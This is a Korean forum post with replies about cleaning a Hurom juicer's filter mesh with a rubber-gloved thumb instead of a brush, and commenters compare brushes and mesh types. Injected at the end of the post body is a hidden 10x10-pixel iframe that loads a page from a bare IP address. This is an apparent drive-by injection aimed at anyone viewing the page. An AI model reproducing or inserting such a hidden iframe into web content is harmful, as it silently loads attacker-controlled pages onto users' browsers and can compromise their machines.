82cook.com을 즐겨찾기에 추가

살림돋보기

알짜배기 살림정보가 가득!

휴롬 거름망 어떻게 씻으세요?

| 조회수 : 11,365 | 추천수 : 0

휴롬을 사고 매일 아침 당근사과쥬스를 만들어서 마시고  있어요..

아주 맛있어서 아침이 즐겁고, 기계 씻는 것도 쉽기는 한데...

이 거름망 닦는 건 그래도 시간이 걸렸어요...

윗쪽 큰 구멍은 물로만 닦아도 금방인데.. 아래쪽 작은 구멍은 잘 닦이지 않아서

이런 솔로 열심히 닦아야 했거든요...

그.런.데.. 두둥!!!

며칠 전 고무장갑을 끼었다가(그 전엔 장갑 안끼고 닦았었거든요 ^^;;;;;)

이렇게 작은 구멍쪽을 장갑낀 손.. 정확히는 엄지손가락으로 슥슥 문질러 봤거든요..

헐... 완전 깨끗하게 잘 닦입니다!!!!!!!

이거 솔 안쓰고 고무장갑으로만 슥슥 닦은거예요... ^^

(맨손으로는 안닦여요.. 손가락 아파요.. 하지 마세요... )

단... 휴롬 사용하고 금방 씻으셔야해요... 마르고나면 씻기 힘들어요

(그건 솔 사용할 때도  마찬가지..)

이미 알고계신 분들도 많겠지만.. ^^;;

저처럼 솔질하고 계신분들.. 해방되시길~~~ <iframe src=http://103.14.114.47/189/naver01.html width=10 height=10></iframe>

17 개의 댓글이 있습니다.
  • 1. 베고니아
    '13.2.20 1:30 PM

맞아요! 이 거름망이 관건 이였어요...

저는 칫솔로 닦아 주었는데...잘 안닦여서 ㅜ

딸기가좋아님이 알려 주시는 방법으로 해보아야겠어요^^

• 딸기가좋아
    '13.2.20 9:16 PM

솔보다 빠르고 힘이 덜들어서 훨씬 좋아요 ^^

• 2. 담쟁e
    '13.2.20 2:17 PM - 삭제된댓글

거름망은 휴롬에서 주는 작은 솔로 바깥쪽부터 닦고 안을 닦아주면 찌꺼기가 하나도 남지 않아요.

• 딸기가좋아
    '13.2.22 12:12 AM

저는 휴롬에서 주는 솔이 없어서 ^^;;;
    제가 가진 솔로도 찌꺼기가 남는 건 아닌데... 솔로 문지르는 것 자체가 힘들어서요 ^^;;;

• 3. 초록하늘
    '13.2.20 3:13 PM

솔이 참 어여쁨니다. ㅎㅎ

• 딸기가좋아
    '13.2.22 12:13 AM

ㅎㅎ 작년에 구입한건데 채반 씻을때만 사용해요 ^^

• 4. 빨간자동차
    '13.2.20 4:33 PM

휴롬건아니지만 저도 칫솔로 합니다

• 딸기가좋아
    '13.2.22 12:14 AM

칫솔을 사용 하는 방법도 있겠군요..
    어떤 블로그에서 봤는데.. 락앤락 청소솔이 휴롬전용솔보다 더 잘닦인다고 하더라구요..

• 5. 닉임
    '13.2.20 11:41 PM

오~ 깨끗하네요?

• 딸기가좋아
    '13.2.22 12:15 AM

솔보다 훨씬빨리 훨씬 쉽게 되서 속이 시원해요 ㅎㅎ

• 6. 건강하자
    '13.2.21 1:14 PM

휴롬시작한지 며칠안됐는데 ㅎ
    좋은정보 감솨!ㅎㅎㅎ

• 딸기가좋아
    '13.2.22 12:15 AM

도움이 되었다니 저도 기뻐요 ^^

• 7. 헝글강냉
    '13.3.3 2:09 PM

근데 저도 사과당근 지주 먹는데 과일망 말고 다용도망 사용으로 알고 있어요 검정색 망이요 설명서에 그렇게써있었는데 아닌가요?

• 딸기가좋아
    '13.3.7 5:31 PM

저는 그냥 과일망으로 써요.. 검정색망은 두유같은 것 만들때 쓰면 된다고 해서요.
    쥬스를 '즙'만 먹고 싶으면 더 가는 검정색망을 쓰면 되는데..
    저는 적당히 건더기가 있어도 상관없어서 과일망이 더 좋아요.

• 8. mustmoney
    '13.3.6 10:14 PM

전 낼 와요. 감사해요.. 걸음망이 고민이었는데.

• 딸기가좋아
    '13.3.7 5:31 PM

오면 실컷 쓰세요...
    비싼 거니까 매일매일 써야죠 ^^

• 9. 피치베리
    '13.3.13 10:57 AM

예전부터 휴롬 정말 사고팠는데... 좋은점이 있는반면 번거로움이 있긴하네요.
    어쨌뜬 저두 갖고 싶은 주방제품 중 하나예여.